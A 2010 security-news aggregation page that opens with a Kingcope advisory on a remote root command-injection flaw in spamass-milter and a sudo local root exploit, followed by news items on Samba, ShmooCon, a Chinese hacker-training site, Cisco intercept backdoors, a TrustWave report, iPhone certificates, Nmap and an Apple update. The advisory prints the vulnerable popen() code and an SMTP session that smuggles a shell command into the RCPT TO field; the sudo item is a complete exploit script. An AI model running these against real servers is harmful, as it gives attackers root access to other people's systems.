uncompiled.com

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif

debug(D_FUNC, “mlfi_envrcpt: enter”);

if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */

char buf[1024];
char *fmt=”%s -bv \”%s\” 2>&1″;

#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

debug(D_RCPT, “calling %s”, buf);

#if defined(__FreeBSD__) /* popen bug – see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, “Could not lock popen mutex: %
s”, strerror(rv));
abort();
}
#endif

p = popen(buf, “r”); [1]
if (!p)
{
debug(D_RCPT, “popen failed(%s). Will not
expand aliases”, strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:”|touch /tmp/foo”
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r–r– 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source

From: Kingcope
Date: Tue, 02 Mar 2010 00:08:44 +0100

Just for the record.

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit < < _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

cheers,
kingcope

Source

A vulnerability in the creation of symbolic links (symlinks) in the free Samba file and printer server can be exploited to attain access to files outside of predefined paths. Attackers can even get access to the system’s root directory (/). To exploit the flaw (directory traversing), attackers first have to have an account on the Samba server that includes write access to at least one share. However, if a share is defined as writeable for guests, the hole can even be exploited remotely without such an account on the server. Under standard settings, no shares are writeable for guests.

Using the link, an attacker can access any file with their current privileges – although anonymous/guest users are limited to the “nobody” account. Because Samba runs with root rights, all data can be read out and modified if the flaw is exploited. To create a specially prepared symlink, you do need a modified SMB client – Nikolaos Rangos (Kingcope), who discovered the flaw, has published a patch – or the module published on the weekend for the Metasploit framework.

The flaw was found in the current Samba 3.4.5 release and previous versions are also affected. The Samba developers have confirmed the flaw, but an update or patch have yet to be released. As a workaround, the developers recommend changing the option wide links under [global] from yes to no (wide links = no) and rebooting the server. According to the description by the Samba team, the flaw occurs because Samba allows symlinks to be created via Unix Extensions in the SMB/CIFS protocol. They therefore plan to have wide links = no as the standard in future versions.

Source

Many CSOs view ShmooCon as an event of small importance. You don’t see the suits and ties that are on display at RSA. In fact, to those who haven’t attended, this conference is just a place where twenty-something hackers come to get drunk and throw TVs out hotel windows. Another crazy Black Hat/Defcon-caliber conference, more than one high-level security exec has told me in the past.

As with any security event, things can get rough around the edges. The security podcasters’ meet-up on Saturday night was more like a Motley Crue concert than anything else. The podcasters on stage resembled the head table at a Klingon wedding. But drunken antics conference-wide were minimal, and some decent food for thought came out of the podcasting event despite the rowdiness.

The larger reality is that a lot of important talks happen here that have implications up and down the IT security food chain. It’s also important to note that a lot of the young ruffians who come here are the very people who find the security holes so they can be fixed. They also build a lot of the technology CSOs lobby their upper management to invest in.

Some examples:
# Tyler Shields of the Veracode Research Lab gave a talk about those BlackBerry phones security execs can no longer live without. His message: The BlackBerry is full of weaknesses an attacker can exploit to target the larger enterprise network.
# Many CSOs have become equally dependent on their iPhones, and they are increasingly being used to conduct business. Guess what? Those devices are equally at risk, according to Trevor Hawthorn, founder and managing principal at Stratum Security. He gave a presentation on how the bad guys can attack through your iPhone apps and tap into your GPS to track your whereabouts.
# Presenters also offered new insight into how attackers are targeting the P2P and social networking platforms your employees use all the time on company-owned computers. [See Inside FarmVille's Sinister Underbelly and P2P Snoopers Know What's In Your Wallet]
# Another running theme this year was about the failure of security spending; where companies spend millions to acquire all the best-of-breed security technology they can find in the rush to check off all the boxes on a compliance checklist but install it all so haphazardly that they actually increase their risk.

While most of the talks were tech-heavy, a lot of the discussion in the presentations and in the hallways were about the language disconnect that often exists between IT and upper management and how best to close the gap.

Source

What is believed to be the country’s biggest hacker training site has been shut down by police in Central China’s Hubei province. Three people were also arrested, local media reported yesterday.

The three, who ran Black Hawk Safety Net, are suspected of offering others online attacking programs and software, a crime recently added to the Criminal Law. A total of 1.7 million yuan ($249,000) in assets were also frozen.

According to the provincial public security department of Hubei, the closure of the website had its roots in a previous Web attack and virus dissemination case in the city of Macheng in 2007, when police found some of the suspects caught were members of Black Hawk Safety Net.

Hubei province named Black Hawk Safety Net as the largest hacker training site in China, which openly recruited members and disseminated hacker techniques through lessons, trojan software and online forum communications.

Since it was established in 2005, the site had recruited more than 12,000 VIP members and collected more than 7 million yuan in membership fees. More than 170,000 people registered for free membership.

Police said more than 50 officers had been investigating the case.

They seized nine Web servers, five computers and one car, and shut down all the sites involved in the case, according to the provincial public security department.

“I could download trojan programs from the site which allowed me to control other people’s computers. I did this just for fun but I also know that many other members could make a fortune by attacking other people’s accounts,” said a 23-year-old member of Black Hawk Safety Net in Nanjing of East China’s Jiangsu province, who asked to remain anonymous.

“It is not very difficult to do simple hacker tasks. Some hacker members are teenagers who dropped out of school and make money by stealing accounts,” he said.

A 20-year-old college student who registered with three different hacker training sites said a hacker training course costs from 100 to 2,000 yuan.

“Basically students were told how to steal accounts and use trojan programs. Sometimes trainers show us how to write programs,” he said.

“But now it’s very difficult to become a registered member. Some well-known hacker training sites have not been accessible since November,” he said.

According to a report released by the National Computer Network Emergency Response Coordination Center of China, the hacker industry in China caused losses of 7.6 billion yuan in 2009.

Source

The “backdoors” that Cisco and other networking companies implement in their routers and switches for lawful intercept are front and center again at this week’s Black Hat security conference. A few years ago, they were cause celebre in some VoIP wiretapping arguments and court rulings.

This time, an IBM researcher told Black Hat conference attendees that these openings can still expose information about us to hackers and allow them to “watch” our Internet activity. Backdoors are implemented in routers and switches so law enforcement officials can track the Internet communications and activity of an individual or individuals under surveillance. They are required by law to be incorporated in devices manufactured by networking companies and sold to ISPs.

In this report from Forbes, IBM Internet Security Systems researcher Tom Cross demonstrated how easily the backdoor in Cisco IOS can be exploited by hackers. When they gain access to a Cisco router, they are not blocked after multiple failed access attempts nor is an alert sent to an administrator. Any data collected through the backdoor can be sent to anywhere — not just merely to an authorized user, Forbes reports.

What’s more, an ISP is not able to perform an audit trail on whoever tried to gain access to a router through the backdoor – that nuance was intended to keep ISP employees from detecting the intercept and inadvertently tipping off the individual under surveillance. But according to IBM’s Cross, any authorized employee can use it for unauthorized surveillance of users and those privacy violations cannot be tracked by the ISP.

Cisco said it is aware of Cross’s assertions and is taking them under consideration. To Cisco’s credit, it is the only networking company that makes its lawful intercept architecture public, according to the recommendations of the IETF, the Forbes story states. Other companies do not, which means they may be susceptible to the same security flaws, or worse.

Source

An over-emphasis on tackling new and emerging security threats may be causing companies to overlook older but far more frequently exploited vulnerabilities, says a recent report.

The report, from TrustWave Inc., is based on an analysis of data gathered from over 1900 penetration tests and over 200 data breach investigations conducted on behalf of clients such as American Express, MasterCard, Discover, Visa and several large retailers.

The analysis showed is that major global companies are employing “vulnerability chasers” and searching out the latest vulnerabilities and zero-day threats while overlooking the most common ones, the report said.

As a result, companies continue to be felled by old and supposedly well-understood vulnerabilities rather than by newfangled attack tools and methods.

For instance, the top three ways hackers gained initial access to corporate networks in 2009 were via remote access applications, trusted internal network connections and SQL injection attacks, TrustWave found.

All three attacks points have been well researched and known about for several years. SQL injection vulnerabilities, for instance, have been known about for at least 10 years, but still continue to be widely prevalent in Web-based, database-driven applications, TrustWave said.

The most common vulnerability that TrustWave discovered during its external network penetration tests had to do with the management interfaces for Web application engines such as Websphere, and Cold Fusion. In many cases, the management interfaces were accessible directly from the Internet and had little or no password protection, potentially allowing attackers to deploy their own malicious applications on the Web server.

Similarly unprotected network infrastructure components such as routers, switches and VPN concentrators represented the second most common vulnerability unearthed by TrustWave. The tendency by many companies to host internal applications on the same server that also hosts external content was another common vulnerability, as were misconfigured firewall rules, default or easy-to-guess passwords and DNS cache poisoning.

Meanwhile TrustWave’s wireless penetration tests unearthed common weaknesses such as the continued use of WEP encryption, legacy 802.11 networks with minimal to no security controls and wireless clients using public “guest” networks instead of secured private networks.

In almost all of the cases, the most common vulnerabilities unearthed by TrustWave were common well-understood issues that should have been addressed a long time ago said Nicholas Percoco, senior vice president at TrustWave’s SpiderLabs research unit.

“There are basically two themes,” Percoco said. “Through our study in 2009 we found some very old vulnerabilities present within enterprises, some as old as 20 to 30 years.” The second theme is that attackers are targeting these old flaws to break into enterprises, then using increasingly sophisticated tools to harvest data from companies, he said.

In addition to older keystroke logging and packet sniffing tools, malicious attackers are increasingly employing tools such as memory parsers and credentialed malware to steal data, Percoco said. Memory parsers are used to monitor the random access memory associated with a certain process and to extract specific data from it. Credentialed malware programs are a new class of multi-user programs that have typically been used to steal money and payment card numbers from ATMs.

There are several measures companies can take to mitigate the risks posed by older and often overlooked vulnerabilities, TrustWave said. One step is to maintain a complete asset inventory. Many companies are often unaware of all the IT assets they own or of the risks they pose to data, so maintaining an up to date list of assets is vital to protecting them, TrustWave said.

Decommissioning older legacy systems as much as possible can also help mitigate the risk. Also, in 80% of the cases that TrustWave looked at, third-parties were responsible for introducing vulnerabilities. So monitoring third-party relationships is key according to the company. Other recommended measures included internal network segmentation, data encryption and stronger Wi-Fi security policies.

Source

There are several flaws in the way that the iPhone handles digital certificates which could lead to an attacker being able to create his own trusted certificate and entice users into downloading malicious files onto their iPhones. The attack is the end result of a number of different problems with the way that the iPhone handles over-the-air provisioning, trusted root certificates and configuration files. But the result of the attack is that a remote hacker may be able to change some settings on the iPhone and force all of the user’s Web traffic to run through any server he chose and also to change the root certificate on the phone, enabling him to man-in-the-middle SSL traffic from the iPhone.

The chain of vulnerabilities and the attack was outlined in an anonymous blog post on the iPhone flaws on Friday. Charlie Miller, an Apple security researcher at Independent Security Evaluators, said that the attack works, although it would not lead to remote code execution on the iPhone.

“It definitely works. I downloaded the file and ran it and it worked,” Miller said. “The only thing is that it warns you that the file will change your phone, but it also says that the certificate is from Apple and it’s been verified.”

The problems start with the fact that the iPhone signs its own credentials using a certificate signed by Apple when it is requesting a configuration file from a remote server during the provisioning process. The only way to establish the validity of the Apple certificate is to verify each of the certificates that leads to the Apple root certificate authority, and that can only be done by getting the data from a jailbroken iPhone.

Source

Nmap is a free and open source utility for network exploration or security auditing.

Nmap 5.20 offers more than 150 significant improvements:

* 30+ new Nmap Scripting Engine scripts
* Enhanced performance and reduced memory consumption
* Protocol-specific payloads for more effectie UDP scanning
* Massive OS and version detection DB updates (10,000+ signatures).

Nmap’s traceroute has been rewritten for better performance. Probes are sent in parallel to individual hosts, not just across all hosts as before. Trace consolidation is more sophisticated, allowing common traces to be identified sooner and fewer probes to be sent.

The older traceroute could be very slow (taking minutes per target) if the target did not respond to the trace probes, and this new traceroute avoids that. In a trace of 110 hosts in a /24 over the Internet, the number of probes sent dropped 50% from 1565 to 743, and the time taken dropped 92% from 95 seconds to 7.6 seconds. Traceroute now uses an ICMP echo request probe if no working probes against the target were discovered during scanning.

Source

Apple has delivered its first Mac OS X security update of the year to close 12 vulnerabilities.

The Flash Player plug-in is getting the most work, as it suffers from seven known flaws, according to an advisory released Tuesday. The most serious of the bugs could result in malicious code execution if a user is tricked into viewing a specially crafted website.

In addition, the update corrects vulnerabilities in CoreAudio, CUPS, ImageIO, Image RAW and Open SSL. The latter suffers from a man-in-the-middle flaw that can enable an attacker to “capture data or change the operations performed in sessions protected by SSL.”

The update can be installed through the operating system’s Software Update preferences, described here, or from Apple Downloads.

Source